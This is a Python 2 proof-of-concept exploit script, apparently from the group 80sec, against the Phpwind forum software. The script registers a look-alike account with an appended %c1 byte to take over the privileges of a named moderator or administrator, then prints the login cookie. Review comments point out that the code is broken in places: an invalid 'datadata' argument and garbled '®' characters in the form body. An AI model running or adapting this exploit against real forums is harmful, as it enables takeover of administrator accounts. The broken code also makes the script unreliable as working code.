import urllib2,httplib,sys  # Python 2 only: urllib2/httplib do not exist under this name in Python 3
# Make httplib print its connection traffic (request and response headers) to stdout,
# so every run of this script leaves a wire-level trace in the console output.
httplib.HTTPConnection.debuglevel = 1
# Cookie-handling opener: Set-Cookie values received on one response are kept by
# the processor and sent back on later requests made through `opener`.
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)
def banner():
    """Write the script's header (blank line, rule, title, author/contact lines) to stdout.

    Purely informational: no arguments, no return value, no state touched.
    """
    header = (
        "",
        "########################################################",
        "Phpwind所有版本管理权限泄露漏洞利用poc",
        "Copyright (C) 2006",
        "jianxin@80sec.com",
        "80sec是一个新的致力于web安全的小团体",
        "http://www.80sec.com",
    )
    # One print per entry, exactly as the original sequence of print statements.
    for entry in header:
        print(entry)
def usage():
    """Write the banner followed by the command-line synopsis and a closing rule to stdout.

    The script body calls this unconditionally, so the text appears on every run,
    not only on a bad invocation. No arguments, no return value.
    """
    banner()
    synopsis = [
        "Usage:\n",
        "$ ./phpwind.py pwforumurl usertoattack\n",
        "pwforumurl 目标论坛地址如http://www.80sec.com/",
        "usertoattack 目标拥有权限的斑竹或管理员",
        "攻击结果将会在目标论坛注册一个和目标用户一样的帐户",
        "最新版本可以使用uid登陆",
        "其他版本可以使用cookie+useragent登陆",
        "########################################################",
        "",
    ]
    # A single write of the newline-joined entries (plus the trailing newline)
    # produces byte-for-byte the same output as one print statement per entry.
    sys.stdout.write("\n".join(synopsis) + "\n")
# ---------------------------------------------------------------------------
# Script body. Runs at import time (no `if __name__ == "__main__":` guard).
# Expected invocation (see usage()): argv[1] = forum base URL, argv[2] = user name.
# There is no argument-count check: argvs[1] / argvs[2] below raise IndexError
# when they are missing, and that happens outside the try block, so it is uncaught.
# ---------------------------------------------------------------------------
argvs = sys.argv
# The usage text is printed on every run, not only on a bad invocation.
usage()


# Form body for the forum's registration handler (step=2). The supplied user name is
# extended with the URL-encoded byte "%c1" and a literal "1" before being sent as
# `regname`. NOTE(review): the string contains stray "®" characters where the field
# separators would normally be; this looks like extraction garbling on the page and is
# left exactly as found.
data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
# argv[1] is used verbatim as the base URL; no validation of scheme or trailing slash.
pwurl = "%s/register.php" % argvs[1]

# The fixed User-Agent value "80sec owned this" is a constant, easily matched
# signature of this script in web-server or proxy logs.
# NOTE(review): `datadata` is not a keyword accepted by urllib2.Request, so as
# written this call raises TypeError (uncaught: it precedes the try block).
request = urllib2.Request(
    url = pwurl ,
    headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
    datadata = data)

# Send the request through the cookie-aware opener built at the top of the file.
f=opener.open(request)
# Response headers as a plain dict; this rebinds the module-level name `headers`.
headers=f.headers.dict
# Raises KeyError (uncaught, before the try) if the response carries no Set-Cookie.
cookie=headers["set-cookie"]
try:
    # str.index() raises ValueError when 'winduser' is absent, which lands in the
    # except branch below; it returns 0 (falsy) when 'winduser' is at offset 0, so
    # the success message is only printed when the substring appears at a non-zero
    # offset. The script's "success" criterion is thus: a Set-Cookie header whose
    # value mentions winduser somewhere after its first character.
    if cookie.index('winduser'):
        print "Exploit Success!"
        print "Login with uid password @80sec or Cookie:"
        print cookie
        print "User-agent: 80sec owned this"
# Bare except: besides the ValueError above it also hides any other error raised
# inside the try, and reports all of them with the same generic message.
except:
    print "Error! http://www.80sec.com"
    print "Connect root#80sec.com"